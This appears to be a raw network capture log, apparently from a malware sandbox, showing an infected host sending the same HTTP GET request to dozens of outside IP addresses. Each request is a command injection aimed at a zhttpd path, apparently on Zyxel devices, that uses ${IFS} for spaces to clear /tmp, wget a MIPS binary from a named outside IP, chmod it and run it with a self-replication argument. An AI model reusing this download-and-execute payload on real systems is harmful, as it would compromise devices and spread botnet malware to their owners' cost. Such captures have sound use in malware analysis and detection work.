                                            Jan 14, 2024 15:50:27.215603113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            993192.168.2.234745864.46.228.118443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.215603113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            994192.168.2.2356402166.168.163.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.215631008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            995192.168.2.233862634.63.37.234443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.215658903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            996192.168.2.2344130144.138.5.100443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.215678930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            997192.168.2.2344974111.93.145.255443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.215717077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            998192.168.2.235508644.10.230.84443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.215749979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            999192.168.2.2334540129.183.63.161443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.215758085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1000192.168.2.235798081.12.20.159443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.215778112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1001192.168.2.233912454.13.123.162443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.215815067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1002192.168.2.2360552149.52.149.90443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.215837002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1003192.168.2.2343946135.225.173.142443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.215859890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1004192.168.2.2342898195.55.160.173443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.215873003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1005192.168.2.235427657.103.133.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.215912104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1006192.168.2.235186436.136.189.75443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.215936899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1007192.168.2.2345888160.236.91.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.215962887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1008192.168.2.233832843.160.215.157443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.216017962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1009192.168.2.233809231.246.183.177443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.216037989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1010192.168.2.234280060.146.108.183443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.216088057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1011192.168.2.2341874144.104.87.114443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.216116905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1012192.168.2.2348948175.77.161.136443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.216119051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1013192.168.2.234132067.211.231.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.216167927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1014192.168.2.2334766210.97.216.32443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.216197968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1015192.168.2.2346382123.46.148.57443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.216207027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1016192.168.2.234857614.237.162.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.216258049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1017192.168.2.234182075.137.43.221443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.216258049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1018192.168.2.2336978164.196.232.81443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.216274023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1019192.168.2.2334220130.28.192.200443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.216304064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1020192.168.2.234900032.166.106.79443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.216334105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1021192.168.2.2340080199.240.61.45443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.216366053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1022192.168.2.2337116177.213.58.43443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.216417074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1023192.168.2.233442882.9.13.28443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.216424942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1024192.168.2.2356840189.230.211.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.216454983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1025192.168.2.235248864.113.147.16443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.216497898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1026192.168.2.2337312186.38.68.171443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.216497898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1027192.168.2.234668070.65.53.139443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.216563940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1028192.168.2.235800852.75.70.144443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.216587067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1029192.168.2.2348246110.174.194.215443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.216614962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1030192.168.2.2350830151.165.187.132443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.216628075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1031192.168.2.2335346124.51.193.95443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.216664076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1032192.168.2.2337624100.150.247.8443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.216687918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1033192.168.2.2350054201.237.49.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.216701984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1034192.168.2.2342062120.159.99.77443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.216711044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1035192.168.2.2357876112.9.184.207443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.216746092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1036192.168.2.234514261.234.7.84443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.216772079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1037192.168.2.234718635.147.30.20443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.216795921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1038192.168.2.2348740122.198.84.204443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.216829062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1039192.168.2.2357590163.202.121.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.216854095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1040192.168.2.2360318182.200.250.103443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.216865063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1041192.168.2.23448149.68.190.170443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.216922998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1042192.168.2.235379492.72.145.19443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.216933966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1043192.168.2.233320827.55.91.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.216964960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1044192.168.2.234212887.241.155.189443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.216995001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1045192.168.2.235465291.24.196.173443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.217016935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1046192.168.2.2343360106.49.137.45443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.217042923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1047192.168.2.2334530132.205.160.184443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.217066050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1048192.168.2.2336238190.113.231.111443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.217125893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1049192.168.2.2340554166.108.54.67443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.217148066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1050192.168.2.233399858.107.222.146443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.217153072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1051192.168.2.234779624.24.192.34443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.217170000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1052192.168.2.234222045.138.25.148443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.217205048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1053192.168.2.2334668156.203.17.11443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.217236996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1054192.168.2.2351016203.200.31.82443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.217253923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1055192.168.2.234002838.121.48.30443
                                            TimestampBytes transferredDirectionData
